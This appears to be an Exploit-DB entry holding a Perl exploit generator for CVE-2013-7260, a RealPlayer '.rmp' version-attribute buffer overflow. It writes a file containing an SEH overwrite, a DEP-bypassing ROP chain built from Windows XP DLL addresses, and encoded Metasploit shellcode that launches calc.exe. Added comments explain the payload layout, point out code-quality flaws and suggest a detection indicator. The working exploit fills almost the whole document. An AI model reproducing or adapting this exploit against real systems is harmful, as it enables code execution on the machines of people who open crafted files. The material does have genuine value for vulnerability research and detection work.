RealNetworks RealPlayer 16.0.3.51/16.0.2.32 – ‘.rmp’ Version Attribute Buffer Overflow

  • 作者: Gabor Seljan
    日期: 2013-12-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/30468/
  • #!/usr/bin/perl
    
    #-----------------------------------------------------------------------------#
    # Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow#
    # Date: Dec 20 2013 #
    # Exploit Author: Gabor Seljan#
    # Vendor Homepage: http://www.real.com#
    # Software Link: http://www.oldapps.com/real.php?old_real_player=12814#
    # Version: 16.0.3.51, 16.0.2.32 #
    # Tested on: Windows XP SP2/SP3 (DEP Bypass)#
    # CVE: CVE-2013-7260#
    #-----------------------------------------------------------------------------#
    
    use strict;
    use warnings;

    # Proof-of-concept generator for CVE-2013-7260 (see header). The script
    # does no network or process work: it only writes one .rmp file whose
    # XML declaration carries the oversized string assembled in $sploit as the
    # value of the "version" attribute (see the print near the end of the file).
    # All offsets and addresses below are the author's values for the RealPlayer
    # builds listed in the header; the gadget addresses are hard-coded into
    # specific Windows XP system DLLs (mswmdm.dll, msvcrt.dll), which is what
    # the header's "Tested on" line pins down.
    my $filename = "sploit.rmp";

    # Layout of the attribute value. The author notes that the distance to the
    # SEH record differs depending on how the file is opened, so the same
    # nSEH/SEH pair is placed twice ($junk2 and $junk3 pad to each location).
    my $junk1 = "\x41" x 44;      # Offset to ROP + Shellcode
    my $junk2 = "\x43" x 1858;    # Offset to SEH when opening via click (2540)
    my $junk3 = "\x44" x 11052;   # Offset to SEH when opening via menu (13600)
    my $nSEH= "\xeb\x06\x90\x90"; # Overwrite next SEH with JMP (6 bytes)
    my $SEH = pack('V',0x5acceecd); # ADD ESP,428 # RETN 10 [mswmdm.dll]
    my $junk4 = "\x45" x 17000;   # Trailing filler so the overflow raises an exception

    # ROP chain (DEP bypass) made of msvcrt.dll gadgets; per the author's
    # per-gadget comments it ends in a VirtualProtect call and then falls
    # through to the NOP sled and shellcode appended in $evil. Each entry is a
    # little-endian 32-bit value (pack 'V').
    my $rop_gadgets= "";
     $rop_gadgets .= pack('V',0x77c1c552);# RETN (ROP NOP) [msvcrt.dll]
     $rop_gadgets .= "\x42" x 16;		# JUNK
     $rop_gadgets .= pack('V',0x77c21d16);# POP EAX # RETN [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c11120);# &VirtualProtect() [IAT msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c1bb36);# POP EBP # RETN [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c20497);# skip 4 bytes [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c2362c);# POP EBX # RETN [msvcrt.dll]
     $rop_gadgets .= pack('V',0x0000095c);# 0x0000095C-> EBX
     $rop_gadgets .= pack('V',0x77c4cb29);# POP EDX # RETN [msvcrt.dll]
     $rop_gadgets .= pack('V',0x00000040);# 0x00000040-> EDX
     $rop_gadgets .= pack('V',0x77c1f519);# POP ECX # RETN [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77C5D305);# &Writable location [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c23b47);# POP EDI # RETN [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c47a42);# RETN (ROP NOP) [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c2ed13);# POP ESI # RETN [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c2aacc);# JMP [EAX] [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c12df9);# PUSHAD # RETN [msvcrt.dll]
     $rop_gadgets .= pack('V',0x77c35459);# PUSH ESP # RETN [msvcrt.dll]

    # Short NOP sled between the end of the ROP chain and the shellcode.
    my $nops = "\x90" x 16;

    # msfpayload windows/exec CMD=calc.exe
    # Encoded Metasploit payload (opaque bytes, generated by the command above);
    # the benign calc.exe command is the usual proof that execution was reached.
    my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1".
    "\x33\x83\xea\xfc\x31\x42\x0e\x03\x6d\x90\x4b\x9a\x8d\x44\x02\x65\x6d\x95\x75".
    "\xef\x88\xa4\xa7\x8b\xd9\x95\x77\xdf\x8f\x15\xf3\x8d\x3b\xad\x71\x1a\x4c\x06".
    "\x3f\x7c\x63\x97\xf1\x40\x2f\x5b\x93\x3c\x2d\x88\x73\x7c\xfe\xdd\x72\xb9\xe2".
    "\x2e\x26\x12\x69\x9c\xd7\x17\x2f\x1d\xd9\xf7\x24\x1d\xa1\x72\xfa\xea\x1b\x7c".
    "\x2a\x42\x17\x36\xd2\xe8\x7f\xe7\xe3\x3d\x9c\xdb\xaa\x4a\x57\xaf\x2d\x9b\xa9".
    "\x50\x1c\xe3\x66\x6f\x91\xee\x77\xb7\x15\x11\x02\xc3\x66\xac\x15\x10\x15\x6a".
    "\x93\x85\xbd\xf9\x03\x6e\x3c\x2d\xd5\xe5\x32\x9a\x91\xa2\x56\x1d\x75\xd9\x62".
    "\x96\x78\x0e\xe3\xec\x5e\x8a\xa8\xb7\xff\x8b\x14\x19\xff\xcc\xf0\xc6\xa5\x87".
    "\x12\x12\xdf\xc5\x78\xe5\x6d\x70\xc5\xe5\x6d\x7b\x65\x8e\x5c\xf0\xea\xc9\x60".
    "\xd3\x4f\x25\x2b\x7e\xf9\xae\xf2\xea\xb8\xb2\x04\xc1\xfe\xca\x86\xe0\x7e\x29".
    "\x96\x80\x7b\x75\x10\x78\xf1\xe6\xf5\x7e\xa6\x07\xdc\x1c\x29\x94\xbc\xcc\xcc".
    "\x1c\x26\x11\x7f\x72\x75\x0a\xf5\x98\x79\x2f\xb1\x76\x30\xe0\x3f\x49\x74\x0d".
    "\x93\x42\x0c\xbf\x92\xb8\x4e\xba\x4a\xbe\x99\x71\x09\xf8\x14\xa9\x96\x91\x7e".
    "\x7c\x77\x27\x25\x7b\x38\xd6\x9b\x33\xd5\xb5\x31\xe1\x66\xb7\xb4\x80\xd2\xfd".
    "\x2d\xb6\x24\x43\x67\x90\xb2\xbb\x47\x40\x73\x3c\x3d\x97\x1c\x29\xd0\xf9\x70".
    "\x4b\x78\x35\x9f\x4f\x2c\xb3\x7a\x05\x87\xf6\xd3\xeb\x48\xb0\x89\xf7\xe2\x41".
    "\x1d\x8d\xb9\x15\x04\x2b\xfc\xa8\x3a\xd4\x37\x7d\x19\xf8\x7e\x08\xeb\x21\xe1".
    "\x7b\x71\x75\x05\x3f\xbb\x66\x0c\x93\x3c\x8d\x98\x69\xf9\x7c\x27\x70\x48\x23".
    "\xd4\x84\xf5\xbe\x72\x4e\xa8\x9b\x73\x25\x41\x81\xe0\x04\x40\x78\x79\x43\x37".
    "\x7f\x2c\x96\xb9\xbf\x74\x77\x1d\x0d\x20\xfc\xb4\x91\xa9\xb8\x97\x4b\x18\xe3".
    "\x49\x7d\x76\x3d\x47\xba\xb5\x14\x99\xb1\x24\x83\xe2\x10\xfd\x67\x7a\x4f\x35".
    "\x9f\xb6\xb3\x7d\x75\x32\xe2\x4a\x86\xd5\xb2\xb7\xb0\x77\x11\xe0\x12\xd1\xeb".
    "\x1c\x90\x7f\x42\x7c\x2d\x92\x72\x2f\x7a\x13\xc0\xd6\x76\x15\x99\x70\x14\x8d".
    "\x4e\xbe\x96\xb7\x85\xff\xc1\xe1\x2d\xb0\x71\x1b\xd5\x1d\x02\xe3\x04\x7b\x05".
    "\xb2\x73\x03\xf8\xb4\x7e\x1a\xfd\xb9\x37\x42\x4b\xb3\x39\xf9\x25\xb5\xa8\x3d".
    "\xba\x92\x40\x4a\xb6\x24\x79\x27\x0c\xbb\x88\xfc\x3c\x35\x97\x4f\x9b\x47\x78".
    "\x15\x41\x91\x66\xb1\x74\x0d\xbf\xb8\x90\x28\xd4\x2a\xf5\x3f\x43\x93\x98\x2c".
    "\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; 

    # Payload proper: ROP chain, NOP sled, then shellcode.
    my $evil = $rop_gadgets.$nops.$shellcode;

    # Full attribute value: lead-in filler, payload, then the two padded
    # nSEH/SEH pairs and the trailing filler.
    my $sploit = $junk1.$evil.$junk2.$nSEH.$SEH.$junk3.$nSEH.$SEH.$junk4;

    # NOTE(review): two-arg open on a bareword handle with an interpolated
    # filename. $filename is a fixed literal here, so mode injection is not
    # reachable, but the safe idiom is a 3-arg open with a lexical handle:
    #   open my $fh, '>', $filename or die "open $filename: $!";
    # The handle is not opened in raw/binmode; on Windows, text-mode newline
    # translation could alter the \x0a bytes in the payload (unverified here).
    open(FILE, ">$filename") || die "[-]Error:\n$!\n";
    # The entire payload travels in the XML declaration's version attribute.
    # Defensive note: a legitimate XML declaration's version is a short token
    # such as "1.0"; an .rmp/XML prolog whose version attribute runs to tens
    # of kilobytes is a high-confidence indicator for file-based detection.
    print FILE "<?xml version=\"$sploit\"?>";
    # NOTE(review): the return value of close() is not checked, so a buffered
    # write error (e.g. disk full) would pass silently and the success message
    # below would still print.
    close(FILE);

    print "Exploit file created successfully [$filename]!\n";